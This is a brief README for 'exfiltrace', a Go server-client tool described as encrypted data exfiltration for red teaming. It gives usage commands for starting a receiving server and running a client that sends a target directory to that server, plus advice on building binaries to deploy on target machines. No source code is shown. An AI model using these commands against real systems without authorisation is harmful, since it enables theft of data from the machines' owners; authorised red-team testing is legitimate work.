# exfiltrace

An encrypted data exfiltration server-client application for Red Teaming.

## Usage

### Server
```go run server/server.go <Listening Address:Port> <Path to Directory to store retreived data> ```

### Client
```go run client/client.go <Server Address:Port> <Path to Target Directory>```

### Note:
If the target machine doesn't have GO installed, you can build the binaries from .go files `go build <server/client>.go` and deploy the binary on it.
